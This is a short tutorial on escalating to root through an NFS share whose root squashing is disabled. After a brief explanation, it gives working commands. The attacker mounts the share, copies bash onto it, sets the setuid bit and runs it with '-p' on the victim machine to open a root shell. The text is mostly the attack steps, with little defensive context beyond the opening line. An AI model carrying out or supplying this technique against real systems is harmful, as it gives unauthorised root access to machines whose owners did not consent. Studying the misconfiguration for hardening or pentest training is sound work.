Introduction
In some environments, the root user on a networked file system is treated as an unprivileged user. This is known as “root squashing.” If root squashing is disabled, an attacker who gains access to an unprivileged account on the file system may be able to escalate their privileges to root.
Demonstration
Attacker machine
Create a directory named /tmp/mount:
mkdir /tmp/mount
Mount the network file system to /tmp/mount:
mount -t nfs <IP>:<SHARED_FOLDER> /tmp/mount
Copy the /bin/bash binary from the attacker’s system to the mounted file system:
cp /usr/bin/bash /tmp/mount
Change the permissions on the copied bash binary to make it setuid root:
chmod +s bash
Victim machine
Execute the modified bash binary with the -p option, which causes bash to open a root shell:
./bash -p